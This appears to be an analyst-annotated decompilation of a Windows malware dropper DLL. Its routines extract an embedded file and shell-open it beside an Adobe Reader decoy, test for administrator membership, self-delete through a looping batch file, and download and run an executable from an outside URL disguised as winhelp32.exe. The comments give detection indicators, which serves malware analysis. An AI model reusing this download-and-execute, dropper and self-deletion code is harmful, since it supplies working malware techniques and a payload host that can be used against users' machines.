- //----- (100010B0) --------------------------------------------------------
- // Decompiler pseudo-code (register/stack-slot annotations are the decompiler's, not the author's).
- // Analyst notes: this routine (1) opens its own module file, reads a 64-byte file name at
- // offset 1024 and a 4-byte length at offset 1088, (2) copies that many bytes from offset
- // 24576 (0x6000) of the module into a new file with that name and shell-opens it, and
- // (3) looks up Adobe Reader through its "App Paths" registry key and starts it.
- // Detection angle: a module that opens its own image with CreateFileA, seeks into it, and
- // then CreateFileA(..., CREATE_ALWAYS) + ShellExecuteA("open") the result.
- int __cdecl MakeAndShowEgg()
- {
- _UNKNOWN *v0; // eax@1
- HANDLE v1; // esi@1
- HANDLE v2; // ebp@1
- void *v3; // edi@1
- int result; // eax@5
- DWORD nNumberOfBytesToWrite; // [sp+10h] [bp-2C4h]@1
- LPCSTR lpApplicationName; // [sp+14h] [bp-2C0h]@3
- HKEY hKey; // [sp+18h] [bp-2BCh]@1
- DWORD NumberOfBytesRead; // [sp+1Ch] [bp-2B8h]@1
- DWORD cbData; // [sp+20h] [bp-2B4h]@2
- char v10; // [sp+24h] [bp-2B0h]@1
- int v11; // [sp+28h] [bp-2ACh]@1
- int v12; // [sp+2Ch] [bp-2A8h]@5
- DWORD NumberOfBytesWritten; // [sp+30h] [bp-2A4h]@1
- DWORD Type; // [sp+34h] [bp-2A0h]@2
- struct _STARTUPINFOA StartupInfo; // [sp+38h] [bp-29Ch]@3
- struct _PROCESS_INFORMATION ProcessInformation; // [sp+7Ch] [bp-258h]@3
- char Buffer; // [sp+8Ch] [bp-248h]@1  -- 64-byte slot (next slot is at +CCh); holds the drop file name
- CHAR FileName; // [sp+CCh] [bp-208h]@1  -- 260-byte slot (MAX_PATH); this module's own path
- BYTE Data; // [sp+1D0h] [bp-104h]@2  -- 260-byte slot; registry value read below
- // MFC module-state bracket (AFX_MAINTAIN_STATE2); restored at the end of the function.
- v0 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v11, v0);
- // 0x10000000 is the usual default DLL image base, so this presumably resolves to the
- // path of this module itself; 0x104 = MAX_PATH.
- GetModuleFileNameA((HMODULE)0x10000000, &FileName, 0x104u);
- // -2147483648u = 0x80000000 = GENERIC_READ; 3 = OPEN_EXISTING. Return value is not checked.
- v1 = CreateFileA(&FileName, -2147483648u, 0, 0, 3u, 0, 0);
- // Offset 1024: 64 bytes used as the output file name. ReadFile writes exactly 64 bytes and
- // nothing here guarantees a NUL terminator inside Buffer.
- SetFilePointer(v1, 1024, 0, 0);
- ReadFile(v1, &Buffer, 64u, &NumberOfBytesRead, 0);
- // Offset 1088 (= 1024 + 64): 4-byte length of the embedded payload. Not range-checked.
- SetFilePointer(v1, 1088, 0, 0);
- ReadFile(v1, &nNumberOfBytesToWrite, 4u, &NumberOfBytesRead, 0);
- // 0x40000000 = GENERIC_WRITE; 2 = CREATE_ALWAYS: (re)creates the file named in Buffer.
- v2 = CreateFileA(&Buffer, 0x40000000u, 0, 0, 2u, 0, 0);
- // Offset 24576 (0x6000): start of the embedded payload inside this module.
- SetFilePointer(v1, 24576, 0, 0);
- v3 = operator new(nNumberOfBytesToWrite);
- // Copy payload module -> new file. Neither ReadFile nor WriteFile results are checked.
- ReadFile(v1, v3, nNumberOfBytesToWrite, &NumberOfBytesRead, 0);
- WriteFile(v2, v3, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
- CloseHandle(v2);
- operator delete(v3);
- CloseHandle(v1);
- // 1 = SW_SHOWNORMAL. Opens the dropped file with the shell's "open" verb, i.e. with
- // whatever handler is registered for its extension; runs even if the drop above failed.
- ShellExecuteA(0, "open", &Buffer, 0, 0, 1);
- // CString v10 is constructed and destroyed but never used (likely an optimised-out temp).
- CString__CString(&v10);
- // 0x20019 = KEY_READ. The "App Paths" key is where Windows records the full path of an
- // installed application's executable (here AcroRd32.exe, Adobe Reader).
- if ( !RegOpenKeyExA(
- HKEY_LOCAL_MACHINE,
- "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\AcroRd32.exe",
- 0,
- 0x20019u,
- &hKey) )
- {
- // cbData = 260 = MAX_PATH, the size of the Data slot. ValueName is a global not shown in
- // this listing, so which value is read (default or a named one) cannot be told here.
- cbData = 260;
- if ( !RegQueryValueExA(hKey, ValueName, 0, &Type, &Data, &cbData) )
- {
- // Builds the command line from a format string at unk_10003020 (contents not in this
- // listing) and the registry value. In MFC a CString is a single buffer pointer, which is
- // presumably why the CString object is passed straight to CreateProcessA below.
- CString__CString(&lpApplicationName);
- CString__Format(&lpApplicationName, (const char *)&unk_10003020, &Data);
- memset(&StartupInfo, 0, sizeof(StartupInfo));
- StartupInfo.cb = 68; // sizeof(STARTUPINFOA) on 32-bit
- StartupInfo.dwFlags = 1; // STARTF_USESHOWWINDOW
- StartupInfo.wShowWindow = 5; // SW_SHOW
- // Starts the reader application visibly; the dropped file is presumably meant to be shown
- // by it, but that link is not confirmed by this listing (no arguments are passed here).
- CreateProcessA(lpApplicationName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
- CString___CString(&lpApplicationName);
- }
- RegCloseKey(hKey);
- }
- CString___CString(&v10);
- // v12 is never assigned in this listing: the three lines below are the decompiler's
- // rendering of the AFX_MAINTAIN_STATE2 destructor restoring the saved module state.
- result = v12;
- *(_DWORD *)(v12 + 4) = v11;
- return result;
- }
- //----- (100012E0) --------------------------------------------------------
- // Decompiler pseudo-code. Returns 1 if the calling thread's (or process's) token contains
- // the BUILTIN\Administrators group (S-1-5-32-544), 0 otherwise or on any API failure.
- // Analyst notes: this is the classic pre-CheckTokenMembership pattern: enumerate
- // TOKEN_GROUPS and EqualSid() each entry against an Administrators SID built with
- // AllocateAndInitializeSid. Only the SID is compared; the group Attributes (e.g.
- // SE_GROUP_USE_FOR_DENY_ONLY on a UAC-filtered token) are never read, so the answer
- // reflects group membership rather than effective privilege. The token handle is never
- // closed on any path.
- char __cdecl IsAdmin()
- {
- _UNKNOWN *v0; // eax@1
- HANDLE v1; // eax@1
- HANDLE v2; // eax@3
- char result; // al@4
- int v4; // eax@9
- void *v5; // esp@9
- unsigned int v6; // edi@15
- PSID *v7; // ebx@16
- char v8; // [sp+0h] [bp-2Ch]@9  -- start of the alloca'd TOKEN_GROUPS buffer (GroupCount)
- char v9; // [sp+4h] [bp-28h]@16  -- TOKEN_GROUPS.Groups[0].Sid
- int v10; // [sp+Ch] [bp-20h]@1
- int v11; // [sp+10h] [bp-1Ch]@4
- struct _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority; // [sp+14h] [bp-18h]@1
- PSID pSid; // [sp+1Ch] [bp-10h]@13
- DWORD ReturnLength; // [sp+20h] [bp-Ch]@5
- HANDLE TokenHandle; // [sp+24h] [bp-8h]@1
- char v16; // [sp+2Bh] [bp-1h]@15  -- "found" flag
- // MFC module-state bracket (AFX_MAINTAIN_STATE2); the `*(_DWORD *)(v11 + 4) = v10`
- // statements before each return are the decompiler's rendering of its destructor.
- v0 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v10, v0);
- // {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY.
- pIdentifierAuthority.Value[0] = 0;
- pIdentifierAuthority.Value[1] = 0;
- pIdentifierAuthority.Value[2] = 0;
- pIdentifierAuthority.Value[3] = 0;
- pIdentifierAuthority.Value[4] = 0;
- pIdentifierAuthority.Value[5] = 5;
- // 8 = TOKEN_QUERY. Try the thread's impersonation token first; 1008 = ERROR_NO_TOKEN
- // means the thread is not impersonating, in which case fall back to the process token.
- v1 = GetCurrentThread();
- if ( !OpenThreadToken(v1, 8u, 0, &TokenHandle) )
- {
- if ( GetLastError() != 1008 )
- {
- LABEL_12:
- result = 0;
- *(_DWORD *)(v11 + 4) = v10;
- return result;
- }
- v2 = GetCurrentProcess();
- if ( !OpenProcessToken(v2, 8u, &TokenHandle) )
- {
- *(_DWORD *)(v11 + 4) = v10;
- return 0;
- }
- }
- // Size query with a NULL buffer: success here is unexpected and treated as "not admin";
- // the expected outcome is failure with 122 = ERROR_INSUFFICIENT_BUFFER and ReturnLength set.
- if ( GetTokenInformation(TokenHandle, TokenGroups, 0, 0, &ReturnLength) )
- {
- *(_DWORD *)(v11 + 4) = v10;
- return 0;
- }
- if ( GetLastError() != 122 )
- {
- result = 0;
- *(_DWORD *)(v11 + 4) = v10;
- return result;
- }
- // Round ReturnLength up to a multiple of 4 and reserve it on the stack (_alloca). The
- // `if ( !&v8 )` test is a decompiler artifact of the original NULL check on the alloca
- // result: the address of a local can never be NULL in C.
- v4 = ReturnLength + 3;
- LOBYTE(v4) = (ReturnLength + 3) & 0xFC;
- v5 = alloca(v4);
- if ( !&v8 )
- {
- *(_DWORD *)(v11 + 4) = v10;
- return 0;
- }
- // Second call fills the TOKEN_GROUPS structure at &v8.
- if ( !GetTokenInformation(TokenHandle, TokenGroups, &v8, ReturnLength, &ReturnLength) )
- goto LABEL_12;
- // 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS:
- // builds S-1-5-32-544 (BUILTIN\Administrators).
- if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) )
- {
- v6 = 0;
- v16 = 0;
- // *(_DWORD *)&v8 is TOKEN_GROUPS.GroupCount; v7 walks Groups[i].Sid. `v7 += 2` advances
- // by two pointers = sizeof(SID_AND_ATTRIBUTES) on 32-bit, skipping the Attributes field.
- if ( *(_DWORD *)&v8 )
- {
- v7 = (PSID *)&v9;
- while ( !EqualSid(*v7, pSid) )
- {
- ++v6;
- v7 += 2;
- if ( v6 >= *(_DWORD *)&v8 )
- goto LABEL_21;
- }
- v16 = 1;
- }
- LABEL_21:
- FreeSid(pSid);
- result = v16;
- *(_DWORD *)(v11 + 4) = v10;
- }
- else
- {
- *(_DWORD *)(v11 + 4) = v10;
- result = 0;
- }
- return result;
- }
- //----- (10001490) --------------------------------------------------------
- // Decompiler pseudo-code. Self-deletion routine: writes a batch file "DMS.bat" next to
- // this module that loops `DEL` on the module's path until the file is gone, then deletes
- // itself; the batch is started suspended at idle priority while this thread/process is
- // raised to time-critical/high priority, then resumed, and PostQuitMessage(0) asks the
- // hosting message loop to exit so the module can be unloaded and deleted.
- // Detection/forensic angle: creation of a DMS.bat in the module's directory, a cmd
- // process started with CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, and the priority changes.
- int __cdecl DeleteMyself()
- {
- signed int v0; // ecx@1
- int v1; // edi@1
- _UNKNOWN *v2; // eax@1
- char v3; // zf@3
- signed int v4; // ecx@5
- signed int v5; // ecx@5
- unsigned int v6; // ebx@5
- CHAR *v7; // edi@5
- const void *v8; // esi@5
- char v9; // zf@7
- HANDLE v10; // esi@9
- int v11; // eax@10
- HANDLE v12; // eax@11
- HANDLE v13; // eax@11
- int result; // eax@12
- int v15; // [sp+Ch] [bp-650h]@1
- int v16; // [sp+10h] [bp-64Ch]@12
- struct _PROCESS_INFORMATION ProcessInformation; // [sp+14h] [bp-648h]@10
- DWORD NumberOfBytesWritten; // [sp+24h] [bp-638h]@10
- struct _STARTUPINFOA StartupInfo; // [sp+28h] [bp-634h]@10
- CHAR FileName; // [sp+6Ch] [bp-5F0h]@1  -- 260-byte slot; becomes "<module dir>\DMS.bat"
- CHAR String2; // [sp+170h] [bp-4ECh]@1  -- 260-byte slot; this module's full path
- CHAR String; // [sp+274h] [bp-3E8h]@10  -- 1000-byte slot; the batch file text
- // MFC module-state bracket (AFX_MAINTAIN_STATE2); restored at the end of the function.
- v2 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v15, v2);
- // 0x10000000 is the usual default DLL image base, so presumably this module's own path.
- GetModuleFileNameA((HMODULE)0x10000000, &String2, 0x104u);
- lstrcpyA(&FileName, &String2);
- // 92 = '\\': truncate the copy at the last backslash, leaving the directory. If the path
- // contained no backslash strrchr would return NULL and this write would dereference it.
- *strrchr(&FileName, 92) = 0;
- // The two do/while loops below are the decompiler's rendering of an inlined strlen
- // (rep scasb style) used to implement strcat(FileName, "\\DMS.bat"): v5 = length of the
- // literal including its NUL, v7-1 = address of FileName's terminating NUL.
- v1 = (int)"\\DMS.bat";
- v0 = -1;
- do
- {
- if ( !v0 )
- break;
- v3 = *(_BYTE *)v1++ == 0;
- --v0;
- }
- while ( !v3 );
- v5 = ~v0;
- v8 = (const void *)(v1 - v5);
- v6 = v5;
- v7 = &FileName;
- v4 = -1;
- do
- {
- if ( !v4 )
- break;
- v9 = *v7++ == 0;
- --v4;
- }
- while ( !v9 );
- memcpy(v7 - 1, v8, v6);
- // 0x40000000 = GENERIC_WRITE; 2 = CREATE_ALWAYS;
- // 0x8000080 = FILE_FLAG_SEQUENTIAL_SCAN | FILE_ATTRIBUTE_NORMAL. (HANDLE)-1 = INVALID_HANDLE_VALUE.
- v10 = CreateFileA(&FileName, 0x40000000u, 0, 0, 2u, 0x8000080u, 0);
- if ( v10 != (HANDLE)-1 )
- {
- // Batch body: retry DEL of the module path until it no longer exists, then DEL the
- // batch file itself (%s = module path, module path, batch path).
- wsprintfA(
- &String,
- ":Repeat\r\nDEL \"%s\"\r\nif exist \"%s\" goto Repeat\r\nDEL \"%s\"\r\n",
- &String2,
- &String2,
- &FileName);
- v11 = lstrlenA(&String);
- WriteFile(v10, &String, v11, &NumberOfBytesWritten, 0);
- CloseHandle(v10);
- memset(&StartupInfo, 0, sizeof(StartupInfo));
- StartupInfo.wShowWindow = 0; // SW_HIDE
- StartupInfo.cb = 68; // sizeof(STARTUPINFOA) on 32-bit
- StartupInfo.dwFlags = 1; // STARTF_USESHOWWINDOW
- // 0x44 = CREATE_SUSPENDED | IDLE_PRIORITY_CLASS. The batch path is passed as the command
- // line, so the shell's handler for .bat is what actually starts. The decompiler shows
- // lpCurrentDirectory as a wide literal; read as ANSI those bytes are just "\" (drive root).
- if ( CreateProcessA(0, &FileName, 0, 0, 0, 0x44u, 0, L"\\", &StartupInfo, &ProcessInformation) )
- {
- // -15 = THREAD_PRIORITY_IDLE for the batch; 15 = THREAD_PRIORITY_TIME_CRITICAL and
- // 0x80 = HIGH_PRIORITY_CLASS for self, so this code finishes before the DEL loop runs.
- SetThreadPriority(ProcessInformation.hThread, -15);
- v12 = GetCurrentThread();
- SetThreadPriority(v12, 15);
- v13 = GetCurrentProcess();
- SetPriorityClass(v13, 0x80u);
- CloseHandle(ProcessInformation.hProcess);
- ResumeThread(ProcessInformation.hThread);
- CloseHandle(ProcessInformation.hThread);
- }
- }
- // Result of GetLastError() is discarded (probably a leftover from a debug build).
- GetLastError();
- // Requests exit of the host's message loop so the module gets unloaded.
- PostQuitMessage(0);
- // v16 is never assigned in this listing: decompiler rendering of the AFX_MAINTAIN_STATE2
- // destructor restoring the saved module state.
- result = v16;
- *(_DWORD *)(v16 + 4) = v15;
- return result;
- }
- //----- (100017A0) --------------------------------------------------------
- // Decompiler pseudo-code. Top-level sequence: change directory to the user's roaming
- // AppData folder, fetch a remote executable and save it there as "winhelp32.exe" (a name
- // chosen to resemble a Windows component), run it if the download reported success, then
- // drop/show the embedded file (MakeAndShowEgg) and self-delete (DeleteMyself).
- // Indicators visible in this listing: URL http://academyhouse.us/from/wincrng.exe,
- // dropped file %APPDATA%\winhelp32.exe, batch file DMS.bat next to the module.
- // Always returns 1.
- char __cdecl StartUp()
- {
- _UNKNOWN *v0; // eax@1
- int v2; // [sp+0h] [bp-10Ch]@1
- int v3; // [sp+4h] [bp-108h]@3
- CHAR PathName; // [sp+8h] [bp-104h]@1  -- 260-byte slot (MAX_PATH)
- // MFC module-state bracket (AFX_MAINTAIN_STATE2); `*(_DWORD *)(v3 + 4) = v2` at the end is
- // the decompiler's rendering of its destructor (v3 is never assigned in this listing).
- v0 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v2, v0);
- // 26 = 0x1A = CSIDL_APPDATA (roaming AppData). Return value not checked, so PathName may be
- // unset if the lookup fails; everything below then operates in an unknown directory.
- SHGetSpecialFolderPathA(0, &PathName, 26, 0);
- SetCurrentDirectoryA(&PathName);
- // DownloadFile is a project function not shown in this listing; the (int) cast on the URL
- // suggests its declared parameter type is not a string pointer. Non-zero = success.
- if ( (unsigned __int8)DownloadFile("winhelp32.exe", (int)"http://academyhouse.us/from/wincrng.exe") )
- WinExec("winhelp32.exe", 5u); // 5 = SW_SHOW; relative name resolves against the new cwd
- MakeAndShowEgg();
- DeleteMyself();
- *(_DWORD *)(v3 + 4) = v2;
- return 1;
- }